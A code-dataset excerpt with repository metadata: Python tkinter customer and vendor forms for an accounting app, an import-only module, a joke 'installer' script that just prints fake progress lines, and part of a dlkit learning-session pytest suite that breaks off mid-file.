] | null | null | null | contact_form.py | chucktilbury/Accounting-TK | d0206f07d44e27eb08ecc5c59442604e0bddc3a3 | [
"MIT"
] | null | null | null | from tkinter import ttk
from tkinter import messagebox as mb
import tkinter as tk
from utility import Logger, debugger
from database import Database
from setup_form import SetupFormBase
from form_widgets import *
from notebk import NoteBk
from importer import Importer
#from import_form import ImportForm
# CREATE TABLE Customer
# (ID INTEGER PRIMARY KEY AUTOINCREMENT,
# date_created TEXT NOT NULL,
# name TEXT NOT NULL,
# address1 TEXT NOT NULL,
# address2 TEXT,
# state TEXT NOT NULL,
# city TEXT NOT NULL,
# zip TEXT NOT NULL,
# email_address TEXT,
# email_status_ID INTEGER,
# phone_number TEXT,
# phone_status_ID INTEGER,
# web_site TEXT,
# description TEXT,
# notes TEXT,
# country_ID INTEGER NOT NULL,
# type_ID INTEGER NOT NULL,
# status_ID INTEGER NOT NULL,
# class_ID INTEGER NOT NULL,
# locked_ID INTEGER NOT NULL);
class CustomerForm(SetupFormBase):
'''
Implement the customer form.
'''
def __init__(self, master, importing=False):
super().__init__(master, 'Customer')
self.form_contents = []
master.grid(padx=10, pady=10)
self.importer = Importer()
row = 0
col = 0
width = 50
header = Header(master, "Setup Customers")
header.grid(row=row, column=col, columnspan=4)
row+=1
col=0
tk.Label(master, text='Name:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.name = EntryBox(master, self.table, 'name', width=width)
self.name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Address1:').grid(row=row, column=col, sticky=(tk.E))
col+=1
address1 = EntryBox(master, self.table, 'address1', width=width)
address1.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(address1.get_line())
row+=1
col=0
tk.Label(master, text='Address2:').grid(row=row, column=col, sticky=(tk.E))
col+=1
address2 = EntryBox(master, self.table, 'address2', width=width)
address2.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(address2.get_line())
row+=1
col=0
tk.Label(master, text='City:').grid(row=row, column=col, sticky=(tk.E))
col+=1
city = EntryBox(master, self.table, 'city')
city.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(city.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='State:').grid(row=row, column=col, sticky=(tk.E))
col+=1
state = EntryBox(master, self.table, 'state')
state.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(state.get_line())
row+=1
col=0
tk.Label(master, text='Zip Code:').grid(row=row, column=col, sticky=(tk.E))
col+=1
zip = EntryBox(master, self.table, 'zip')
zip.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(zip.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Country:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.country_ID = ComboBox(master, self.table, 'country_ID')
self.country_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.country_ID.get_line())
row+=1
col=0
tk.Label(master, text='Email:').grid(row=row, column=col, sticky=(tk.E))
col+=1
email_address = EntryBox(master, self.table, 'email_address')
email_address.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(email_address.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Email Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.email_status_ID = ComboBox(master, self.table, 'email_status_ID')
self.email_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.email_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Phone:').grid(row=row, column=col, sticky=(tk.E))
col+=1
phone_number = EntryBox(master, self.table, 'phone_number')
phone_number.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(phone_number.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Phone Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.phone_status_ID = ComboBox(master, self.table, 'phone_status_ID')
self.phone_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.phone_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Web Site:').grid(row=row, column=col, sticky=(tk.E))
col+=1
web_site = EntryBox(master, self.table, 'web_site')
web_site.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(web_site.get_line())
#row+=1
#col=0
col += 1
tk.Label(master, text='Class:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.class_ID = ComboBox(master, self.table, 'class_ID')
self.class_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.class_ID.get_line())
row+=1
col=0
tk.Label(master, text='Description:').grid(row=row, column=col, sticky=(tk.E))
col+=1
description = EntryBox(master, self.table, 'description', width=width)
description.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(description.get_line())
row+=1
col=0
tk.Label(master, text='Notes:').grid(row=row, column=0, sticky=(tk.E))
col+=1
notes = NotesBox(master, self.table, 'notes', height=15)
notes.grid(row=row, column=col, columnspan=3, sticky=(tk.W))
self.form_contents.append(notes.get_line())
row+=1
col=0
buttons = ButtonBox(master, 'customer_form')
buttons.grid(row=row, column=col, columnspan=4)
buttons.register_events(
self.next_btn_command,
self.prev_btn_command,
self.select_button_command,
self.new_button_command,
self.save_button_command,
self.del_button_command
)
self.row = row
self.notebook_callback()
def notebook_callback(self):
self.class_ID.populate('ContactClass', 'name')
self.phone_status_ID.populate('PhoneStatus', 'name')
self.email_status_ID.populate('EmailStatus', 'name')
self.country_ID.populate('Country', 'name')
self.set_form()
@debugger
def del_button_command(self):
'''
Delete the item given in the form from the database.
This is an override to the parent class.
'''
row = self.data.get_row_list('SaleRecord', 'committed_ID = 1 and customer_ID = %d'%(self.id_list[self.crnt_index]))
if not row is None:
mb.showerror("ERROR", "Cannot delete the record because there are transactions committed for this customer.")
return
row = self.data.get_row_list('SaleRecord', 'committed_ID = 2 and customer_ID = %d'%(self.id_list[self.crnt_index]))
#print('\n\n%s\n\n'%(str(row)))
if not row is None:
val = mb.askokcancel("Sure?", "There are %d uncommitted sales for this Customer. They will be deleted as well.\n\nContinue?"%(len(row)))
if val:
count = 0
for item in row:
self.data.delete_row('SaleRecord', row[0]['ID'])
count += 1
mb.showinfo('INFO', 'There were %d Sale Records deleted.'%(count))
else:
return
val = mb.askokcancel("Sure?", "Are you sure you want to delete item from %s?"%(self.table))
if val:
self.logger.info("Deleting item %d from %s"%(self.id_list[self.crnt_index], self.table))
self.data.delete_row(self.table, self.id_list[self.crnt_index])
self.data.commit()
self.id_list = self.get_id_list()
if self.crnt_index >= len(self.id_list):
self.crnt_index -= 1
self.set_form()
# CREATE TABLE Vendor
# (ID INTEGER PRIMARY KEY AUTOINCREMENT,
# date_created TEXT,
# name TEXT NOT NULL,
# description TEXT,
# notes TEXT,
# email_address TEXT,
# email_status_ID INTEGER,
# phone_number TEXT,
# phone_status_ID INTEGER,
# web_site TEXT);
class VendorForm(SetupFormBase):
'''
Implement the vendor form.
'''
def __init__(self, master, importing=False):
super().__init__(master, 'Vendor')
self.form_contents = []
master.grid(padx=10, pady=10)
self.importer = Importer()
row = 0
col = 0
width = 50
header = Header(master, "Setup Vendors")
header.grid(row=row, column=col, columnspan=4)
row+=1
col=0
tk.Label(master, text='Name:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.name = EntryBox(master, self.table, 'name', width=width)
self.name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Contact:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.contact_name = EntryBox(master, self.table, 'contact_name', width=width)
self.contact_name.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(self.name.get_line())
row+=1
col=0
tk.Label(master, text='Description:').grid(row=row, column=col, sticky=(tk.E))
col+=1
description = EntryBox(master, self.table, 'description', width=width)
description.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(description.get_line())
row+=1
col=0
tk.Label(master, text='Email:').grid(row=row, column=col, sticky=(tk.E))
col+=1
email_address = EntryBox(master, self.table, 'email_address')
email_address.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(email_address.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Email Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.email_status_ID = ComboBox(master, self.table, 'email_status_ID')
self.email_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.email_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Phone:').grid(row=row, column=col, sticky=(tk.E))
col+=1
phone_number = EntryBox(master, self.table, 'phone_number')
phone_number.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(phone_number.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Phone Status:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.phone_status_ID = ComboBox(master, self.table, 'phone_status_ID')
self.phone_status_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.phone_status_ID.get_line())
row+=1
col=0
tk.Label(master, text='Web Site:').grid(row=row, column=col, sticky=(tk.E))
col+=1
web_site = EntryBox(master, self.table, 'web_site', width=width)
web_site.grid(row=row, column=col, sticky=(tk.W), columnspan=4)
self.form_contents.append(web_site.get_line())
#row+=1
#col=0
col+=1
tk.Label(master, text='Vendor Type:').grid(row=row, column=col, sticky=(tk.E))
col+=1
self.type_ID = ComboBox(master, self.table, 'type_ID')
self.type_ID.grid(row=row, column=col, sticky=(tk.W))
self.form_contents.append(self.type_ID.get_line())
row+=1
col=0
tk.Label(master, text='Notes:').grid(row=row, column=0, sticky=(tk.E))
col+=1
notes = NotesBox(master, self.table, 'notes')
notes.grid(row=row, column=col, columnspan=3, sticky=(tk.W))
self.form_contents.append(notes.get_line())
row+=1
col=0
buttons = ButtonBox(master, 'vendor_form')
buttons.grid(row=row, column=col, columnspan=4)
buttons.register_events(
self.next_btn_command,
self.prev_btn_command,
self.select_button_command,
self.new_button_command,
self.save_button_command,
self.del_button_command
)
self.row = row
self.notebook_callback()
@debugger
def notebook_callback(self):
self.email_status_ID.populate('EmailStatus', 'name')
self.type_ID.populate('VendorType', 'name')
self.phone_status_ID.populate('PhoneStatus', 'name')
self.set_form()
@debugger
def del_button_command(self):
'''
Delete the item given in the form from the database.
This is an override to the parent class.
'''
row = self.data.get_row_list('PurchaseRecord', 'committed_ID = 1 and vendor_ID = %d'%(self.id_list[self.crnt_index]))
if not row is None:
mb.showerror("ERROR", "Cannot delete the record because there are transactions committed for this vendor.")
return
row = self.data.get_row_list('PurchaseRecord', 'committed_ID = 2 and vendor_ID = %d'%(self.id_list[self.crnt_index]))
print('\n\n%s\n\n'%(str(row)))
if not row is None:
val = mb.askokcancel("Sure?", "There are %d uncommitted sales for this vendor. They will be deleted as well.\n\nContinue?"%(len(row)))
if val:
count = 0
for item in row:
self.data.delete_row('PurchaseRecord', row[0]['ID'])
count += 1
mb.showinfo('INFO', 'There were %d Purchase Records deleted.'%(count))
else:
return
val = mb.askokcancel("Sure?", "Are you sure you want to delete item from %s?"%(self.table))
if val:
self.logger.info("Deleting item %d from %s"%(self.id_list[self.crnt_index], self.table))
self.data.delete_row(self.table, self.id_list[self.crnt_index])
self.data.commit()
self.id_list = self.get_id_list()
if self.crnt_index >= len(self.id_list):
self.crnt_index -= 1
self.set_form()
| 37.22963 | 148 | 0.596299 | 2,049 | 15,078 | 4.260127 | 0.085896 | 0.038492 | 0.061863 | 0.09898 | 0.861725 | 0.839501 | 0.839501 | 0.838126 | 0.812006 | 0.786573 | 0 | 0.013109 | 0.266415 | 15,078 | 404 | 149 | 37.321782 | 0.77606 | 0.089534 | 0 | 0.738832 | 0 | 0.006873 | 0.105844 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020619 | false | 0 | 0.044674 | 0 | 0.085911 | 0.003436 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e60dffc6bc2e3bd84228c9accbeebcb485120284 | 131 | py | Python | cog/services/registration/__init__.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 6 | 2016-03-10T19:38:17.000Z | 2021-02-23T09:34:59.000Z | cog/services/registration/__init__.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 602 | 2015-01-05T16:30:08.000Z | 2021-02-02T21:44:38.000Z | cog/services/registration/__init__.py | cedadev/COG | 6167f9114c7cf0422b34fb9f5f3f07f9657a7dbe | [
"BSD-3-Clause"
] | 18 | 2015-02-12T15:50:17.000Z | 2021-04-27T16:40:36.000Z | from registration import RegistrationService
from registration_impl import ESGFRegistrationServiceImpl, esgfRegistrationServiceImpl | 65.5 | 86 | 0.931298 | 10 | 131 | 12.1 | 0.6 | 0.264463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061069 | 131 | 2 | 86 | 65.5 | 0.98374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e62bcf32deec7f6c62a32aa8f99b76f50058e670 | 986 | py | Python | Puk pakc/ShtAPI_v1.4_free_installer.py | Shtuks/Puk | 4525ddf61121dc5632695e73928716003dcab37d | [
"Unlicense"
] | 1 | 2021-11-09T15:51:49.000Z | 2021-11-09T15:51:49.000Z | ShtAPI_v1.4_free_installer.py | Shtuks/Puk | 4525ddf61121dc5632695e73928716003dcab37d | [
"Unlicense"
] | null | null | null | ShtAPI_v1.4_free_installer.py | Shtuks/Puk | 4525ddf61121dc5632695e73928716003dcab37d | [
"Unlicense"
] | null | null | null | #Forge installer
print("Forge v1.4 installer pirate")
input("Нажмите Enter для старта\n")
print("Установка...")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("| (0/0МБ)")
print("|| (0/0МБ)")
print("||| (0/0МБ)")
print("ПУК")
#Выход из программы
input("\nНажмите Enter чтобы выйти.") | 21.434783 | 37 | 0.465517 | 134 | 986 | 3.425373 | 0.164179 | 0.470588 | 0.705882 | 1.098039 | 0.716776 | 0.716776 | 0.716776 | 0.716776 | 0.716776 | 0.716776 | 0 | 0.091133 | 0.176471 | 986 | 46 | 38 | 21.434783 | 0.474138 | 0.033469 | 0 | 0.878049 | 0 | 0 | 0.542448 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.95122 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
e62fb57545f8c6b927fde79111bdaf925693ef9b | 210,608 | py | Python | tests/learning/test_sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | tests/learning/test_sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | tests/learning/test_sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """Unit tests of learning sessions."""
import datetime
import pytest
from ..utilities.general import is_never_authz, is_no_authz, uses_cataloging, uses_filesystem_only
from dlkit.abstract_osid.hierarchy.objects import Hierarchy
from dlkit.abstract_osid.id.objects import IdList
from dlkit.abstract_osid.learning import objects as ABCObjects
from dlkit.abstract_osid.learning import queries as ABCQueries
from dlkit.abstract_osid.learning.objects import ObjectiveBank as ABCObjectiveBank
from dlkit.abstract_osid.learning.objects import ObjectiveList
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.osid.objects import OsidCatalogForm, OsidCatalog
from dlkit.abstract_osid.osid.objects import OsidForm
from dlkit.abstract_osid.osid.objects import OsidList
from dlkit.abstract_osid.osid.objects import OsidNode
from dlkit.json_.id.objects import IdList
from dlkit.primordium.calendaring.primitives import DateTime
from dlkit.primordium.id.primitives import Id
from dlkit.primordium.type.primitives import Type
from dlkit.runtime import PROXY_SESSION, proxy_example
from dlkit.runtime.managers import Runtime
REQUEST = proxy_example.SimpleRequest()
CONDITION = PROXY_SESSION.get_proxy_condition()
CONDITION.set_http_request(REQUEST)
PROXY = PROXY_SESSION.get_proxy(CONDITION)
DEFAULT_TYPE = Type(**{'identifier': 'DEFAULT', 'namespace': 'DEFAULT', 'authority': 'DEFAULT'})
DEFAULT_GENUS_TYPE = Type(**{'identifier': 'DEFAULT', 'namespace': 'GenusType', 'authority': 'DLKIT.MIT.EDU'})
ALIAS_ID = Id(**{'identifier': 'ALIAS', 'namespace': 'ALIAS', 'authority': 'ALIAS'})
NEW_TYPE = Type(**{'identifier': 'NEW', 'namespace': 'MINE', 'authority': 'YOURS'})
NEW_TYPE_2 = Type(**{'identifier': 'NEW 2', 'namespace': 'MINE', 'authority': 'YOURS'})
AGENT_ID = Id(**{'identifier': 'jane_doe', 'namespace': 'osid.agent.Agent', 'authority': 'MIT-ODL'})
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_lookup_session_class_fixture(request):
# Implemented from init template for ResourceLookupSession
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_lookup_session_test_fixture(request):
request.cls.objective_list = list()
request.cls.objective_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1]:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + str(num)
create_form.description = 'Test Objective for ObjectiveLookupSession tests'
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_lookup_session_class_fixture", "objective_lookup_session_test_fixture")
class TestObjectiveLookupSession(object):
"""Tests for ObjectiveLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_objectives(self):
"""Tests can_lookup_objectives"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_objectives(), bool)
def test_use_comparative_objective_view(self):
"""Tests use_comparative_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_objective_view()
def test_use_plenary_objective_view(self):
"""Tests use_plenary_objective_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_objective_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_objective(self):
"""Tests get_objective"""
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_objective(self.objective_list[0].ident)
assert obj.ident == self.objective_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_objective(self.objective_list[0].ident)
assert obj.ident == self.objective_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_objective(self.fake_id)
def test_get_objectives_by_ids(self):
"""Tests get_objectives_by_ids"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_ids(self.objective_ids)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_ids(self.objective_ids)
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objectives_by_genus_type(self):
"""Tests get_objectives_by_genus_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objectives_by_parent_genus_type(self):
"""Tests get_objectives_by_parent_genus_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
if not is_never_authz(self.service_config):
objects = self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ObjectiveList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz "tries harder" and runs the actual query...
# whereas above the method itself in JSON returns an empty list
self.catalog.get_objectives_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_objectives_by_record_type(self):
"""Tests get_objectives_by_record_type"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ObjectiveList)
def test_get_objectives(self):
"""Tests get_objectives"""
from dlkit.abstract_osid.learning.objects import ObjectiveList
objects = self.catalog.get_objectives()
assert isinstance(objects, ObjectiveList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_objectives()
assert isinstance(objects, ObjectiveList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
def test_get_objective_with_alias(self):
if not is_never_authz(self.service_config):
self.catalog.alias_objective(self.objective_ids[0], ALIAS_ID)
obj = self.catalog.get_objective(ALIAS_ID)
assert obj.get_id() == self.objective_ids[0]
class FakeQuery:
_cat_id_args_list = []
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_query_session_class_fixture(request):
# From test_templates/resource.py::ResourceQuerySession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def objective_query_session_test_fixture(request):
# From test_templates/resource.py::ResourceQuerySession::init_template
request.cls.objective_list = list()
request.cls.objective_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective ' + color
create_form.description = (
'Test Objective for ObjectiveQuerySession tests, did I mention green')
obj = request.cls.catalog.create_objective(create_form)
request.cls.objective_list.append(obj)
request.cls.objective_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_query_session_class_fixture", "objective_query_session_test_fixture")
class TestObjectiveQuerySession(object):
"""Tests for ObjectiveQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_objectives(self):
"""Tests can_search_objectives"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_objectives(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_objective_query(self):
"""Tests get_objective_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_objective_query()
assert isinstance(query, ABCQueries.ObjectiveQuery)
def test_get_objectives_by_query(self):
"""Tests get_objectives_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_objective_query()
query.match_display_name('orange')
assert self.catalog.get_objectives_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_objectives_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_objectives_by_query(FakeQuery())
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_admin_session_class_fixture(request):
# From test_templates/resource.py::ResourceAdminSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.assessment_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
else:
request.cls.catalog = request.cls.svc_mgr.get_objective_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
